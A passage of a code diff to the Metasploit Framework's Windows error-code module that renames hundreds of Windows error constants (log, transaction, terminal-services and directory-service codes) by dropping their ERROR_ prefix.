CLUSTER_SHARED_VOLUMES_IN_USE = 0x173B + CLUSTER_USE_SHARED_VOLUMES_API = 0x173C + CLUSTER_BACKUP_IN_PROGRESS = 0x173D + NON_CSV_PATH = 0x173E + CSV_VOLUME_NOT_LOCAL = 0x173F + CLUSTER_WATCHDOG_TERMINATING = 0x1740 + ENCRYPTION_FAILED = 0x1770 + DECRYPTION_FAILED = 0x1771 + FILE_ENCRYPTED = 0x1772 + NO_RECOVERY_POLICY = 0x1773 + NO_EFS = 0x1774 + WRONG_EFS = 0x1775 + NO_USER_KEYS = 0x1776 + FILE_NOT_ENCRYPTED = 0x1777 + NOT_EXPORT_FORMAT = 0x1778 + FILE_READ_ONLY = 0x1779 + DIR_EFS_DISALLOWED = 0x177A + EFS_SERVER_NOT_TRUSTED = 0x177B + BAD_RECOVERY_POLICY = 0x177C + EFS_ALG_BLOB_TOO_BIG = 0x177D + VOLUME_NOT_SUPPORT_EFS = 0x177E + EFS_DISABLED = 0x177F + EFS_VERSION_NOT_SUPPORT = 0x1780 + CS_ENCRYPTION_INVALID_SERVER_RESPONSE = 0x1781 + CS_ENCRYPTION_UNSUPPORTED_SERVER = 0x1782 + CS_ENCRYPTION_EXISTING_ENCRYPTED_FILE = 0x1783 + CS_ENCRYPTION_NEW_ENCRYPTED_FILE = 0x1784 + CS_ENCRYPTION_FILE_NOT_CSE = 0x1785 + NO_BROWSER_SERVERS_FOUND = 0x17E6 SCHED_E_SERVICE_NOT_LOCALSYSTEM = 0x1838 - ERROR_LOG_SECTOR_INVALID = 0x19C8 - ERROR_LOG_SECTOR_PARITY_INVALID = 0x19C9 - ERROR_LOG_SECTOR_REMAPPED = 0x19CA - ERROR_LOG_BLOCK_INCOMPLETE = 0x19CB - ERROR_LOG_INVALID_RANGE = 0x19CC - ERROR_LOG_BLOCKS_EXHAUSTED = 0x19CD - ERROR_LOG_READ_CONTEXT_INVALID = 0x19CE - ERROR_LOG_RESTART_INVALID = 0x19CF - ERROR_LOG_BLOCK_VERSION = 0x19D0 - ERROR_LOG_BLOCK_INVALID = 0x19D1 - ERROR_LOG_READ_MODE_INVALID = 0x19D2 - ERROR_LOG_NO_RESTART = 0x19D3 - ERROR_LOG_METADATA_CORRUPT = 0x19D4 - ERROR_LOG_METADATA_INVALID = 0x19D5 - ERROR_LOG_METADATA_INCONSISTENT = 0x19D6 - ERROR_LOG_RESERVATION_INVALID = 0x19D7 - ERROR_LOG_CANT_DELETE = 0x19D8 - ERROR_LOG_CONTAINER_LIMIT_EXCEEDED = 0x19D9 - ERROR_LOG_START_OF_LOG = 0x19DA - ERROR_LOG_POLICY_ALREADY_INSTALLED = 0x19DB - ERROR_LOG_POLICY_NOT_INSTALLED = 0x19DC - ERROR_LOG_POLICY_INVALID = 0x19DD - ERROR_LOG_POLICY_CONFLICT = 0x19DE - ERROR_LOG_PINNED_ARCHIVE_TAIL = 0x19DF - ERROR_LOG_RECORD_NONEXISTENT = 0x19E0 - ERROR_LOG_RECORDS_RESERVED_INVALID = 0x19E1 - ERROR_LOG_SPACE_RESERVED_INVALID = 0x19E2 - ERROR_LOG_TAIL_INVALID = 0x19E3 - ERROR_LOG_FULL = 0x19E4 - ERROR_COULD_NOT_RESIZE_LOG = 0x19E5 - ERROR_LOG_MULTIPLEXED = 0x19E6 - ERROR_LOG_DEDICATED = 0x19E7 - ERROR_LOG_ARCHIVE_NOT_IN_PROGRESS = 0x19E8 - ERROR_LOG_ARCHIVE_IN_PROGRESS = 0x19E9 - ERROR_LOG_EPHEMERAL = 0x19EA - ERROR_LOG_NOT_ENOUGH_CONTAINERS = 0x19EB - ERROR_LOG_CLIENT_ALREADY_REGISTERED = 0x19EC - ERROR_LOG_CLIENT_NOT_REGISTERED = 0x19ED - ERROR_LOG_FULL_HANDLER_IN_PROGRESS = 0x19EE - ERROR_LOG_CONTAINER_READ_FAILED = 0x19EF - ERROR_LOG_CONTAINER_WRITE_FAILED = 0x19F0 - ERROR_LOG_CONTAINER_OPEN_FAILED = 0x19F1 - ERROR_LOG_CONTAINER_STATE_INVALID = 0x19F2 - ERROR_LOG_STATE_INVALID = 0x19F3 - ERROR_LOG_PINNED = 0x19F4 - ERROR_LOG_METADATA_FLUSH_FAILED = 0x19F5 - ERROR_LOG_INCONSISTENT_SECURITY = 0x19F6 - ERROR_LOG_APPENDED_FLUSH_FAILED = 0x19F7 - ERROR_LOG_PINNED_RESERVATION = 0x19F8 - ERROR_INVALID_TRANSACTION = 0x1A2C - ERROR_TRANSACTION_NOT_ACTIVE = 0x1A2D - ERROR_TRANSACTION_REQUEST_NOT_VALID = 0x1A2E - ERROR_TRANSACTION_NOT_REQUESTED = 0x1A2F - ERROR_TRANSACTION_ALREADY_ABORTED = 0x1A30 - ERROR_TRANSACTION_ALREADY_COMMITTED = 0x1A31 - ERROR_TM_INITIALIZATION_FAILED = 0x1A32 - ERROR_RESOURCEMANAGER_READ_ONLY = 0x1A33 - ERROR_TRANSACTION_NOT_JOINED = 0x1A34 - ERROR_TRANSACTION_SUPERIOR_EXISTS = 0x1A35 - ERROR_CRM_PROTOCOL_ALREADY_EXISTS = 0x1A36 - ERROR_TRANSACTION_PROPAGATION_FAILED = 0x1A37 - ERROR_CRM_PROTOCOL_NOT_FOUND = 0x1A38 - ERROR_TRANSACTION_INVALID_MARSHALL_BUFFER = 0x1A39 - ERROR_CURRENT_TRANSACTION_NOT_VALID = 0x1A3A - ERROR_TRANSACTION_NOT_FOUND = 0x1A3B - ERROR_RESOURCEMANAGER_NOT_FOUND = 0x1A3C - ERROR_ENLISTMENT_NOT_FOUND = 0x1A3D - ERROR_TRANSACTIONMANAGER_NOT_FOUND = 0x1A3E - ERROR_TRANSACTIONMANAGER_NOT_ONLINE = 0x1A3F - ERROR_TRANSACTIONMANAGER_RECOVERY_NAME_COLLISION = 0x1A40 - ERROR_TRANSACTION_NOT_ROOT = 0x1A41 - ERROR_TRANSACTION_OBJECT_EXPIRED = 0x1A42 - ERROR_TRANSACTION_RESPONSE_NOT_ENLISTED = 0x1A43 - ERROR_TRANSACTION_RECORD_TOO_LONG = 0x1A44 - ERROR_IMPLICIT_TRANSACTION_NOT_SUPPORTED = 0x1A45 - ERROR_TRANSACTION_INTEGRITY_VIOLATED = 0x1A46 - ERROR_TRANSACTIONMANAGER_IDENTITY_MISMATCH = 0x1A47 - ERROR_RM_CANNOT_BE_FROZEN_FOR_SNAPSHOT = 0x1A48 - ERROR_TRANSACTION_MUST_WRITETHROUGH = 0x1A49 - ERROR_TRANSACTION_NO_SUPERIOR = 0x1A4A - ERROR_HEURISTIC_DAMAGE_POSSIBLE = 0x1A4B - ERROR_TRANSACTIONAL_CONFLICT = 0x1A90 - ERROR_RM_NOT_ACTIVE = 0x1A91 - ERROR_RM_METADATA_CORRUPT = 0x1A92 - ERROR_DIRECTORY_NOT_RM = 0x1A93 - ERROR_TRANSACTIONS_UNSUPPORTED_REMOTE = 0x1A95 - ERROR_LOG_RESIZE_INVALID_SIZE = 0x1A96 - ERROR_OBJECT_NO_LONGER_EXISTS = 0x1A97 - ERROR_STREAM_MINIVERSION_NOT_FOUND = 0x1A98 - ERROR_STREAM_MINIVERSION_NOT_VALID = 0x1A99 - ERROR_MINIVERSION_INACCESSIBLE_FROM_SPECIFIED_TRANSACTION = 0x1A9A - ERROR_CANT_OPEN_MINIVERSION_WITH_MODIFY_INTENT = 0x1A9B - ERROR_CANT_CREATE_MORE_STREAM_MINIVERSIONS = 0x1A9C - ERROR_REMOTE_FILE_VERSION_MISMATCH = 0x1A9E - ERROR_HANDLE_NO_LONGER_VALID = 0x1A9F - ERROR_NO_TXF_METADATA = 0x1AA0 - ERROR_LOG_CORRUPTION_DETECTED = 0x1AA1 - ERROR_CANT_RECOVER_WITH_HANDLE_OPEN = 0x1AA2 - ERROR_RM_DISCONNECTED = 0x1AA3 - ERROR_ENLISTMENT_NOT_SUPERIOR = 0x1AA4 - ERROR_RECOVERY_NOT_NEEDED = 0x1AA5 - ERROR_RM_ALREADY_STARTED = 0x1AA6 - ERROR_FILE_IDENTITY_NOT_PERSISTENT = 0x1AA7 - ERROR_CANT_BREAK_TRANSACTIONAL_DEPENDENCY = 0x1AA8 - ERROR_CANT_CROSS_RM_BOUNDARY = 0x1AA9 - ERROR_TXF_DIR_NOT_EMPTY = 0x1AAA - ERROR_INDOUBT_TRANSACTIONS_EXIST = 0x1AAB - ERROR_TM_VOLATILE = 0x1AAC - ERROR_ROLLBACK_TIMER_EXPIRED = 0x1AAD - ERROR_TXF_ATTRIBUTE_CORRUPT = 0x1AAE - ERROR_EFS_NOT_ALLOWED_IN_TRANSACTION = 0x1AAF - ERROR_TRANSACTIONAL_OPEN_NOT_ALLOWED = 0x1AB0 - ERROR_LOG_GROWTH_FAILED = 0x1AB1 - ERROR_TRANSACTED_MAPPING_UNSUPPORTED_REMOTE = 0x1AB2 - ERROR_TXF_METADATA_ALREADY_PRESENT = 0x1AB3 - ERROR_TRANSACTION_SCOPE_CALLBACKS_NOT_SET = 0x1AB4 - ERROR_TRANSACTION_REQUIRED_PROMOTION = 0x1AB5 - ERROR_CANNOT_EXECUTE_FILE_IN_TRANSACTION = 0x1AB6 - ERROR_TRANSACTIONS_NOT_FROZEN = 0x1AB7 - ERROR_TRANSACTION_FREEZE_IN_PROGRESS = 0x1AB8 - ERROR_NOT_SNAPSHOT_VOLUME = 0x1AB9 - ERROR_NO_SAVEPOINT_WITH_OPEN_FILES = 0x1ABA - ERROR_DATA_LOST_REPAIR = 0x1ABB - ERROR_SPARSE_NOT_ALLOWED_IN_TRANSACTION = 0x1ABC - ERROR_TM_IDENTITY_MISMATCH = 0x1ABD - ERROR_FLOATED_SECTION = 0x1ABE - ERROR_CANNOT_ACCEPT_TRANSACTED_WORK = 0x1ABF - ERROR_CANNOT_ABORT_TRANSACTIONS = 0x1AC0 - ERROR_BAD_CLUSTERS = 0x1AC1 - ERROR_COMPRESSION_NOT_ALLOWED_IN_TRANSACTION = 0x1AC2 - ERROR_VOLUME_DIRTY = 0x1AC3 - ERROR_NO_LINK_TRACKING_IN_TRANSACTION = 0x1AC4 - ERROR_OPERATION_NOT_SUPPORTED_IN_TRANSACTION = 0x1AC5 - ERROR_EXPIRED_HANDLE = 0x1AC6 - ERROR_TRANSACTION_NOT_ENLISTED = 0x1AC7 - ERROR_CTX_WINSTATION_NAME_INVALID = 0x1B59 - ERROR_CTX_INVALID_PD = 0x1B5A - ERROR_CTX_PD_NOT_FOUND = 0x1B5B - ERROR_CTX_WD_NOT_FOUND = 0x1B5C - ERROR_CTX_CANNOT_MAKE_EVENTLOG_ENTRY = 0x1B5D - ERROR_CTX_SERVICE_NAME_COLLISION = 0x1B5E - ERROR_CTX_CLOSE_PENDING = 0x1B5F - ERROR_CTX_NO_OUTBUF = 0x1B60 - ERROR_CTX_MODEM_INF_NOT_FOUND = 0x1B61 - ERROR_CTX_INVALID_MODEMNAME = 0x1B62 - ERROR_CTX_MODEM_RESPONSE_ERROR = 0x1B63 - ERROR_CTX_MODEM_RESPONSE_TIMEOUT = 0x1B64 - ERROR_CTX_MODEM_RESPONSE_NO_CARRIER = 0x1B65 - ERROR_CTX_MODEM_RESPONSE_NO_DIALTONE = 0x1B66 - ERROR_CTX_MODEM_RESPONSE_BUSY = 0x1B67 - ERROR_CTX_MODEM_RESPONSE_VOICE = 0x1B68 - ERROR_CTX_TD_ERROR = 0x1B69 - ERROR_CTX_WINSTATION_NOT_FOUND = 0x1B6E - ERROR_CTX_WINSTATION_ALREADY_EXISTS = 0x1B6F - ERROR_CTX_WINSTATION_BUSY = 0x1B70 - ERROR_CTX_BAD_VIDEO_MODE = 0x1B71 - ERROR_CTX_GRAPHICS_INVALID = 0x1B7B - ERROR_CTX_LOGON_DISABLED = 0x1B7D - ERROR_CTX_NOT_CONSOLE = 0x1B7E - ERROR_CTX_CLIENT_QUERY_TIMEOUT = 0x1B80 - ERROR_CTX_CONSOLE_DISCONNECT = 0x1B81 - ERROR_CTX_CONSOLE_CONNECT = 0x1B82 - ERROR_CTX_SHADOW_DENIED = 0x1B84 - ERROR_CTX_WINSTATION_ACCESS_DENIED = 0x1B85 - ERROR_CTX_INVALID_WD = 0x1B89 - ERROR_CTX_SHADOW_INVALID = 0x1B8A - ERROR_CTX_SHADOW_DISABLED = 0x1B8B - ERROR_CTX_CLIENT_LICENSE_IN_USE = 0x1B8C - ERROR_CTX_CLIENT_LICENSE_NOT_SET = 0x1B8D - ERROR_CTX_LICENSE_NOT_AVAILABLE = 0x1B8E - ERROR_CTX_LICENSE_CLIENT_INVALID = 0x1B8F - ERROR_CTX_LICENSE_EXPIRED = 0x1B90 - ERROR_CTX_SHADOW_NOT_RUNNING = 0x1B91 - ERROR_CTX_SHADOW_ENDED_BY_MODE_CHANGE = 0x1B92 - ERROR_ACTIVATION_COUNT_EXCEEDED = 0x1B93 - ERROR_CTX_WINSTATIONS_DISABLED = 0x1B94 - ERROR_CTX_ENCRYPTION_LEVEL_REQUIRED = 0x1B95 - ERROR_CTX_SESSION_IN_USE = 0x1B96 - ERROR_CTX_NO_FORCE_LOGOFF = 0x1B97 - ERROR_CTX_ACCOUNT_RESTRICTION = 0x1B98 - ERROR_RDP_PROTOCOL_ERROR = 0x1B99 - ERROR_CTX_CDM_CONNECT = 0x1B9A - ERROR_CTX_CDM_DISCONNECT = 0x1B9B - ERROR_CTX_SECURITY_LAYER_ERROR = 0x1B9C - ERROR_TS_INCOMPATIBLE_SESSIONS = 0x1B9D - ERROR_TS_VIDEO_SUBSYSTEM_ERROR = 0x1B9E + LOG_SECTOR_INVALID = 0x19C8 + LOG_SECTOR_PARITY_INVALID = 0x19C9 + LOG_SECTOR_REMAPPED = 0x19CA + LOG_BLOCK_INCOMPLETE = 0x19CB + LOG_INVALID_RANGE = 0x19CC + LOG_BLOCKS_EXHAUSTED = 0x19CD + LOG_READ_CONTEXT_INVALID = 0x19CE + LOG_RESTART_INVALID = 0x19CF + LOG_BLOCK_VERSION = 0x19D0 + LOG_BLOCK_INVALID = 0x19D1 + LOG_READ_MODE_INVALID = 0x19D2 + LOG_NO_RESTART = 0x19D3 + LOG_METADATA_CORRUPT = 0x19D4 + LOG_METADATA_INVALID = 0x19D5 + LOG_METADATA_INCONSISTENT = 0x19D6 + LOG_RESERVATION_INVALID = 0x19D7 + LOG_CANT_DELETE = 0x19D8 + LOG_CONTAINER_LIMIT_EXCEEDED = 0x19D9 + LOG_START_OF_LOG = 0x19DA + LOG_POLICY_ALREADY_INSTALLED = 0x19DB + LOG_POLICY_NOT_INSTALLED = 0x19DC + LOG_POLICY_INVALID = 0x19DD + LOG_POLICY_CONFLICT = 0x19DE + LOG_PINNED_ARCHIVE_TAIL = 0x19DF + LOG_RECORD_NONEXISTENT = 0x19E0 + LOG_RECORDS_RESERVED_INVALID = 0x19E1 + LOG_SPACE_RESERVED_INVALID = 0x19E2 + LOG_TAIL_INVALID = 0x19E3 + LOG_FULL = 0x19E4 + COULD_NOT_RESIZE_LOG = 0x19E5 + LOG_MULTIPLEXED = 0x19E6 + LOG_DEDICATED = 0x19E7 + LOG_ARCHIVE_NOT_IN_PROGRESS = 0x19E8 + LOG_ARCHIVE_IN_PROGRESS = 0x19E9 + LOG_EPHEMERAL = 0x19EA + LOG_NOT_ENOUGH_CONTAINERS = 0x19EB + LOG_CLIENT_ALREADY_REGISTERED = 0x19EC + LOG_CLIENT_NOT_REGISTERED = 0x19ED + LOG_FULL_HANDLER_IN_PROGRESS = 0x19EE + LOG_CONTAINER_READ_FAILED = 0x19EF + LOG_CONTAINER_WRITE_FAILED = 0x19F0 + LOG_CONTAINER_OPEN_FAILED = 0x19F1 + LOG_CONTAINER_STATE_INVALID = 0x19F2 + LOG_STATE_INVALID = 0x19F3 + LOG_PINNED = 0x19F4 + LOG_METADATA_FLUSH_FAILED = 0x19F5 + LOG_INCONSISTENT_SECURITY = 0x19F6 + LOG_APPENDED_FLUSH_FAILED = 0x19F7 + LOG_PINNED_RESERVATION = 0x19F8 + INVALID_TRANSACTION = 0x1A2C + TRANSACTION_NOT_ACTIVE = 0x1A2D + TRANSACTION_REQUEST_NOT_VALID = 0x1A2E + TRANSACTION_NOT_REQUESTED = 0x1A2F + TRANSACTION_ALREADY_ABORTED = 0x1A30 + TRANSACTION_ALREADY_COMMITTED = 0x1A31 + TM_INITIALIZATION_FAILED = 0x1A32 + RESOURCEMANAGER_READ_ONLY = 0x1A33 + TRANSACTION_NOT_JOINED = 0x1A34 + TRANSACTION_SUPERIOR_EXISTS = 0x1A35 + CRM_PROTOCOL_ALREADY_EXISTS = 0x1A36 + TRANSACTION_PROPAGATION_FAILED = 0x1A37 + CRM_PROTOCOL_NOT_FOUND = 0x1A38 + TRANSACTION_INVALID_MARSHALL_BUFFER = 0x1A39 + CURRENT_TRANSACTION_NOT_VALID = 0x1A3A + TRANSACTION_NOT_FOUND = 0x1A3B + RESOURCEMANAGER_NOT_FOUND = 0x1A3C + ENLISTMENT_NOT_FOUND = 0x1A3D + TRANSACTIONMANAGER_NOT_FOUND = 0x1A3E + TRANSACTIONMANAGER_NOT_ONLINE = 0x1A3F + TRANSACTIONMANAGER_RECOVERY_NAME_COLLISION = 0x1A40 + TRANSACTION_NOT_ROOT = 0x1A41 + TRANSACTION_OBJECT_EXPIRED = 0x1A42 + TRANSACTION_RESPONSE_NOT_ENLISTED = 0x1A43 + TRANSACTION_RECORD_TOO_LONG = 0x1A44 + IMPLICIT_TRANSACTION_NOT_SUPPORTED = 0x1A45 + TRANSACTION_INTEGRITY_VIOLATED = 0x1A46 + TRANSACTIONMANAGER_IDENTITY_MISMATCH = 0x1A47 + RM_CANNOT_BE_FROZEN_FOR_SNAPSHOT = 0x1A48 + TRANSACTION_MUST_WRITETHROUGH = 0x1A49 + TRANSACTION_NO_SUPERIOR = 0x1A4A + HEURISTIC_DAMAGE_POSSIBLE = 0x1A4B + TRANSACTIONAL_CONFLICT = 0x1A90 + RM_NOT_ACTIVE = 0x1A91 + RM_METADATA_CORRUPT = 0x1A92 + DIRECTORY_NOT_RM = 0x1A93 + TRANSACTIONS_UNSUPPORTED_REMOTE = 0x1A95 + LOG_RESIZE_INVALID_SIZE = 0x1A96 + OBJECT_NO_LONGER_EXISTS = 0x1A97 + STREAM_MINIVERSION_NOT_FOUND = 0x1A98 + STREAM_MINIVERSION_NOT_VALID = 0x1A99 + MINIVERSION_INACCESSIBLE_FROM_SPECIFIED_TRANSACTION = 0x1A9A + CANT_OPEN_MINIVERSION_WITH_MODIFY_INTENT = 0x1A9B + CANT_CREATE_MORE_STREAM_MINIVERSIONS = 0x1A9C + REMOTE_FILE_VERSION_MISMATCH = 0x1A9E + HANDLE_NO_LONGER_VALID = 0x1A9F + NO_TXF_METADATA = 0x1AA0 + LOG_CORRUPTION_DETECTED = 0x1AA1 + CANT_RECOVER_WITH_HANDLE_OPEN = 0x1AA2 + RM_DISCONNECTED = 0x1AA3 + ENLISTMENT_NOT_SUPERIOR = 0x1AA4 + RECOVERY_NOT_NEEDED = 0x1AA5 + RM_ALREADY_STARTED = 0x1AA6 + FILE_IDENTITY_NOT_PERSISTENT = 0x1AA7 + CANT_BREAK_TRANSACTIONAL_DEPENDENCY = 0x1AA8 + CANT_CROSS_RM_BOUNDARY = 0x1AA9 + TXF_DIR_NOT_EMPTY = 0x1AAA + INDOUBT_TRANSACTIONS_EXIST = 0x1AAB + TM_VOLATILE = 0x1AAC + ROLLBACK_TIMER_EXPIRED = 0x1AAD + TXF_ATTRIBUTE_CORRUPT = 0x1AAE + EFS_NOT_ALLOWED_IN_TRANSACTION = 0x1AAF + TRANSACTIONAL_OPEN_NOT_ALLOWED = 0x1AB0 + LOG_GROWTH_FAILED = 0x1AB1 + TRANSACTED_MAPPING_UNSUPPORTED_REMOTE = 0x1AB2 + TXF_METADATA_ALREADY_PRESENT = 0x1AB3 + TRANSACTION_SCOPE_CALLBACKS_NOT_SET = 0x1AB4 + TRANSACTION_REQUIRED_PROMOTION = 0x1AB5 + CANNOT_EXECUTE_FILE_IN_TRANSACTION = 0x1AB6 + TRANSACTIONS_NOT_FROZEN = 0x1AB7 + TRANSACTION_FREEZE_IN_PROGRESS = 0x1AB8 + NOT_SNAPSHOT_VOLUME = 0x1AB9 + NO_SAVEPOINT_WITH_OPEN_FILES = 0x1ABA + DATA_LOST_REPAIR = 0x1ABB + SPARSE_NOT_ALLOWED_IN_TRANSACTION = 0x1ABC + TM_IDENTITY_MISMATCH = 0x1ABD + FLOATED_SECTION = 0x1ABE + CANNOT_ACCEPT_TRANSACTED_WORK = 0x1ABF + CANNOT_ABORT_TRANSACTIONS = 0x1AC0 + BAD_CLUSTERS = 0x1AC1 + COMPRESSION_NOT_ALLOWED_IN_TRANSACTION = 0x1AC2 + VOLUME_DIRTY = 0x1AC3 + NO_LINK_TRACKING_IN_TRANSACTION = 0x1AC4 + OPERATION_NOT_SUPPORTED_IN_TRANSACTION = 0x1AC5 + EXPIRED_HANDLE = 0x1AC6 + TRANSACTION_NOT_ENLISTED = 0x1AC7 + CTX_WINSTATION_NAME_INVALID = 0x1B59 + CTX_INVALID_PD = 0x1B5A + CTX_PD_NOT_FOUND = 0x1B5B + CTX_WD_NOT_FOUND = 0x1B5C + CTX_CANNOT_MAKE_EVENTLOG_ENTRY = 0x1B5D + CTX_SERVICE_NAME_COLLISION = 0x1B5E + CTX_CLOSE_PENDING = 0x1B5F + CTX_NO_OUTBUF = 0x1B60 + CTX_MODEM_INF_NOT_FOUND = 0x1B61 + CTX_INVALID_MODEMNAME = 0x1B62 + CTX_MODEM_RESPONSE_ERROR = 0x1B63 + CTX_MODEM_RESPONSE_TIMEOUT = 0x1B64 + CTX_MODEM_RESPONSE_NO_CARRIER = 0x1B65 + CTX_MODEM_RESPONSE_NO_DIALTONE = 0x1B66 + CTX_MODEM_RESPONSE_BUSY = 0x1B67 + CTX_MODEM_RESPONSE_VOICE = 0x1B68 + CTX_TD_ERROR = 0x1B69 + CTX_WINSTATION_NOT_FOUND = 0x1B6E + CTX_WINSTATION_ALREADY_EXISTS = 0x1B6F + CTX_WINSTATION_BUSY = 0x1B70 + CTX_BAD_VIDEO_MODE = 0x1B71 + CTX_GRAPHICS_INVALID = 0x1B7B + CTX_LOGON_DISABLED = 0x1B7D + CTX_NOT_CONSOLE = 0x1B7E + CTX_CLIENT_QUERY_TIMEOUT = 0x1B80 + CTX_CONSOLE_DISCONNECT = 0x1B81 + CTX_CONSOLE_CONNECT = 0x1B82 + CTX_SHADOW_DENIED = 0x1B84 + CTX_WINSTATION_ACCESS_DENIED = 0x1B85 + CTX_INVALID_WD = 0x1B89 + CTX_SHADOW_INVALID = 0x1B8A + CTX_SHADOW_DISABLED = 0x1B8B + CTX_CLIENT_LICENSE_IN_USE = 0x1B8C + CTX_CLIENT_LICENSE_NOT_SET = 0x1B8D + CTX_LICENSE_NOT_AVAILABLE = 0x1B8E + CTX_LICENSE_CLIENT_INVALID = 0x1B8F + CTX_LICENSE_EXPIRED = 0x1B90 + CTX_SHADOW_NOT_RUNNING = 0x1B91 + CTX_SHADOW_ENDED_BY_MODE_CHANGE = 0x1B92 + ACTIVATION_COUNT_EXCEEDED = 0x1B93 + CTX_WINSTATIONS_DISABLED = 0x1B94 + CTX_ENCRYPTION_LEVEL_REQUIRED = 0x1B95 + CTX_SESSION_IN_USE = 0x1B96 + CTX_NO_FORCE_LOGOFF = 0x1B97 + CTX_ACCOUNT_RESTRICTION = 0x1B98 + RDP_PROTOCOL_ERROR = 0x1B99 + CTX_CDM_CONNECT = 0x1B9A + CTX_CDM_DISCONNECT = 0x1B9B + CTX_SECURITY_LAYER_ERROR = 0x1B9C + TS_INCOMPATIBLE_SESSIONS = 0x1B9D + TS_VIDEO_SUBSYSTEM_ERROR = 0x1B9E FRS_ERR_INVALID_API_SEQUENCE = 0x1F41 FRS_ERR_STARTING_SERVICE = 0x1F42 FRS_ERR_STOPPING_SERVICE = 0x1F43 @@ -1613,505 +1613,505 @@ module Msf::Post::Windows::Error FRS_ERR_SYSVOL_IS_BUSY = 0x1F4F FRS_ERR_SYSVOL_DEMOTE = 0x1F50 FRS_ERR_INVALID_SERVICE_PARAMETER = 0x1F51 - ERROR_DS_NOT_INSTALLED = 0x2008 - ERROR_DS_MEMBERSHIP_EVALUATED_LOCALLY = 0x2009 - ERROR_DS_NO_ATTRIBUTE_OR_VALUE = 0x200A - ERROR_DS_INVALID_ATTRIBUTE_SYNTAX = 0x200B - ERROR_DS_ATTRIBUTE_TYPE_UNDEFINED = 0x200C - ERROR_DS_ATTRIBUTE_OR_VALUE_EXISTS = 0x200D - ERROR_DS_BUSY = 0x200E - ERROR_DS_UNAVAILABLE = 0x200F - ERROR_DS_NO_RIDS_ALLOCATED = 0x2010 - ERROR_DS_NO_MORE_RIDS = 0x2011 - ERROR_DS_INCORRECT_ROLE_OWNER = 0x2012 - ERROR_DS_RIDMGR_INIT_ERROR = 0x2013 - ERROR_DS_OBJ_CLASS_VIOLATION = 0x2014 - ERROR_DS_CANT_ON_NON_LEAF = 0x2015 - ERROR_DS_CANT_ON_RDN = 0x2016 - ERROR_DS_CANT_MOD_OBJ_CLASS = 0x2017 - ERROR_DS_CROSS_DOM_MOVE_ERROR = 0x2018 - ERROR_DS_GC_NOT_AVAILABLE = 0x2019 - ERROR_SHARED_POLICY = 0x201A - ERROR_POLICY_OBJECT_NOT_FOUND = 0x201B - ERROR_POLICY_ONLY_IN_DS = 0x201C - ERROR_PROMOTION_ACTIVE = 0x201D - ERROR_NO_PROMOTION_ACTIVE = 0x201E - ERROR_DS_OPERATIONS_ERROR = 0x2020 - ERROR_DS_PROTOCOL_ERROR = 0x2021 - ERROR_DS_TIMELIMIT_EXCEEDED = 0x2022 - ERROR_DS_SIZELIMIT_EXCEEDED = 0x2023 - ERROR_DS_ADMIN_LIMIT_EXCEEDED = 0x2024 - ERROR_DS_COMPARE_FALSE = 0x2025 - ERROR_DS_COMPARE_TRUE = 0x2026 - ERROR_DS_AUTH_METHOD_NOT_SUPPORTED = 0x2027 - ERROR_DS_STRONG_AUTH_REQUIRED = 0x2028 - ERROR_DS_INAPPROPRIATE_AUTH = 0x2029 - ERROR_DS_AUTH_UNKNOWN = 0x202A - ERROR_DS_REFERRAL = 0x202B - ERROR_DS_UNAVAILABLE_CRIT_EXTENSION = 0x202C - ERROR_DS_CONFIDENTIALITY_REQUIRED = 0x202D - ERROR_DS_INAPPROPRIATE_MATCHING = 0x202E - ERROR_DS_CONSTRAINT_VIOLATION = 0x202F - ERROR_DS_NO_SUCH_OBJECT = 0x2030 - ERROR_DS_ALIAS_PROBLEM = 0x2031 - ERROR_DS_INVALID_DN_SYNTAX = 0x2032 - ERROR_DS_IS_LEAF = 0x2033 - ERROR_DS_ALIAS_DEREF_PROBLEM = 0x2034 - ERROR_DS_UNWILLING_TO_PERFORM = 0x2035 - ERROR_DS_LOOP_DETECT = 0x2036 - ERROR_DS_NAMING_VIOLATION = 0x2037 - ERROR_DS_OBJECT_RESULTS_TOO_LARGE = 0x2038 - ERROR_DS_AFFECTS_MULTIPLE_DSAS = 0x2039 - ERROR_DS_SERVER_DOWN = 0x203A - ERROR_DS_LOCAL_ERROR = 0x203B - ERROR_DS_ENCODING_ERROR = 0x203C - ERROR_DS_DECODING_ERROR = 0x203D - ERROR_DS_FILTER_UNKNOWN = 0x203E - ERROR_DS_PARAM_ERROR = 0x203F - ERROR_DS_NOT_SUPPORTED = 0x2040 - ERROR_DS_NO_RESULTS_RETURNED = 0x2041 - ERROR_DS_CONTROL_NOT_FOUND = 0x2042 - ERROR_DS_CLIENT_LOOP = 0x2043 - ERROR_DS_REFERRAL_LIMIT_EXCEEDED = 0x2044 - ERROR_DS_SORT_CONTROL_MISSING = 0x2045 - ERROR_DS_OFFSET_RANGE_ERROR = 0x2046 - ERROR_DS_ROOT_MUST_BE_NC = 0x206D - ERROR_DS_ADD_REPLICA_INHIBITED = 0x206E - ERROR_DS_ATT_NOT_DEF_IN_SCHEMA = 0x206F - ERROR_DS_MAX_OBJ_SIZE_EXCEEDED = 0x2070 - ERROR_DS_OBJ_STRING_NAME_EXISTS = 0x2071 - ERROR_DS_NO_RDN_DEFINED_IN_SCHEMA = 0x2072 - ERROR_DS_RDN_DOESNT_MATCH_SCHEMA = 0x2073 - ERROR_DS_NO_REQUESTED_ATTS_FOUND = 0x2074 - ERROR_DS_USER_BUFFER_TO_SMALL = 0x2075 - ERROR_DS_ATT_IS_NOT_ON_OBJ = 0x2076 - ERROR_DS_ILLEGAL_MOD_OPERATION = 0x2077 - ERROR_DS_OBJ_TOO_LARGE = 0x2078 - ERROR_DS_BAD_INSTANCE_TYPE = 0x2079 - ERROR_DS_MASTERDSA_REQUIRED = 0x207A - ERROR_DS_OBJECT_CLASS_REQUIRED = 0x207B - ERROR_DS_MISSING_REQUIRED_ATT = 0x207C - ERROR_DS_ATT_NOT_DEF_FOR_CLASS = 0x207D - ERROR_DS_ATT_ALREADY_EXISTS = 0x207E - ERROR_DS_CANT_ADD_ATT_VALUES = 0x2080 - ERROR_DS_SINGLE_VALUE_CONSTRAINT = 0x2081 - ERROR_DS_RANGE_CONSTRAINT = 0x2082 - ERROR_DS_ATT_VAL_ALREADY_EXISTS = 0x2083 - ERROR_DS_CANT_REM_MISSING_ATT = 0x2084 - ERROR_DS_CANT_REM_MISSING_ATT_VAL = 0x2085 - ERROR_DS_ROOT_CANT_BE_SUBREF = 0x2086 - ERROR_DS_NO_CHAINING = 0x2087 - ERROR_DS_NO_CHAINED_EVAL = 0x2088 - ERROR_DS_NO_PARENT_OBJECT = 0x2089 - ERROR_DS_PARENT_IS_AN_ALIAS = 0x208A - 